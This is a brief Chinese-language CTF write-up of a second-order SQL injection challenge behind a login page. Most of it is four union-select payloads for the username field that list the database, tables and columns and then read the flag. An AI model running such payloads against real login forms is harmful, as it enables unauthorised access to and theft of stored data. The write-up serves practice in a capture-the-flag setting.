题目就是二次注入，打开是一个登录界面，和[[RCTF2015]EasySQL](https://www.silent666.com/index.php/archives/68/)相似

按照那题的思路在username处进行注入
payload
username =1' union select database() #

username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #

username =1' union select group_concat(column_name) from information_schema.columns where table_name='flag'#

username =1' union select flag from flag #

估计是这段时间最后一次更新write-up